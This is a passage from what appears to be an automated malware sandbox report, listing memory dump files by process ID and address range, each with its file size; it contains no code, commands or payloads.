                                                                                                                                                                              5.4MB

                                                                                                                                                                            • memory/1060-275-0x0000000002890000-0x0000000002915000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              532KB

                                                                                                                                                                            • memory/1060-662-0x00000000036E0000-0x00000000037A3000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              780KB

                                                                                                                                                                            • memory/1060-317-0x0000000002BF0000-0x0000000002C58000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              416KB

                                                                                                                                                                            • memory/1060-647-0x0000000002D70000-0x0000000002DEC000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              496KB

                                                                                                                                                                            • memory/1104-680-0x0000000001B70000-0x00000000020D4000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              5.4MB

                                                                                                                                                                            • memory/1884-104-0x0000000000950000-0x0000000000A50000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              1024KB

                                                                                                                                                                            • memory/1884-106-0x0000000000860000-0x000000000089E000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              248KB

                                                                                                                                                                            • memory/2080-160-0x00007FF9851B0000-0x00007FF985C71000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              10.8MB

                                                                                                                                                                            • memory/2080-158-0x000001A556060000-0x000001A556082000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              136KB

                                                                                                                                                                            • memory/2080-161-0x000001A56E320000-0x000001A56E330000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/2080-163-0x000001A56E320000-0x000001A56E330000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/2080-167-0x00007FF9851B0000-0x00007FF985C71000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              10.8MB

                                                                                                                                                                            • memory/2532-169-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              972KB

                                                                                                                                                                            • memory/2532-137-0x0000000000700000-0x0000000000800000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              1024KB

                                                                                                                                                                            • memory/2532-138-0x00000000006D0000-0x00000000006F6000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              152KB

                                                                                                                                                                            • memory/2532-135-0x0000000000400000-0x0000000000639000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              2.2MB

                                                                                                                                                                            • memory/2532-188-0x0000000000400000-0x0000000000639000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              2.2MB

                                                                                                                                                                            • memory/3428-124-0x0000000000550000-0x0000000000C4D000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                            • memory/3428-125-0x0000000010000000-0x0000000010564000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              5.4MB

                                                                                                                                                                            • memory/3428-194-0x0000000000550000-0x0000000000C4D000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                            • memory/4008-205-0x0000000003D20000-0x0000000003D30000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/4008-219-0x0000000074C50000-0x0000000075400000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.7MB

                                                                                                                                                                            • memory/4008-204-0x0000000003D20000-0x0000000003D30000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/4008-203-0x0000000074C50000-0x0000000075400000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.7MB

                                                                                                                                                                            • memory/4008-215-0x0000000005830000-0x000000000587C000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              304KB

                                                                                                                                                                            • memory/4008-216-0x0000000003D20000-0x0000000003D30000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/4344-199-0x0000000000CF0000-0x00000000013ED000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.0MB

                                                                                                                                                                            • memory/4344-200-0x0000000010000000-0x0000000010564000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              5.4MB

                                                                                                                                                                            • memory/4620-3-0x0000000005C80000-0x0000000005C90000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/4620-4-0x00000000059B0000-0x00000000059CE000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              120KB

                                                                                                                                                                            • memory/4620-1-0x0000000000430000-0x0000000000FCA000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              11.6MB

                                                                                                                                                                            • memory/4620-11-0x0000000074C50000-0x0000000075400000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.7MB

                                                                                                                                                                            • memory/4620-2-0x00000000059E0000-0x0000000005A56000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              472KB

                                                                                                                                                                            • memory/4620-7-0x0000000005D40000-0x0000000005D5A000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              104KB

                                                                                                                                                                            • memory/4620-0-0x0000000074C50000-0x0000000075400000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              7.7MB

                                                                                                                                                                            • memory/4620-5-0x0000000005C90000-0x0000000005CDA000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              296KB

                                                                                                                                                                            • memory/4620-6-0x0000000006290000-0x0000000006834000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              5.6MB

                                                                                                                                                                            • memory/4836-109-0x0000000000400000-0x0000000000441000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              260KB

                                                                                                                                                                            • memory/4836-110-0x0000000000400000-0x0000000000441000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              260KB

                                                                                                                                                                            • memory/4836-114-0x0000000000400000-0x0000000000441000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              260KB

                                                                                                                                                                            • memory/4836-107-0x0000000000400000-0x0000000000441000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              260KB

                                                                                                                                                                            • memory/4836-196-0x0000000000400000-0x0000000000441000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              260KB

                                                                                                                                                                            • memory/4836-147-0x0000000000400000-0x0000000000441000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              260KB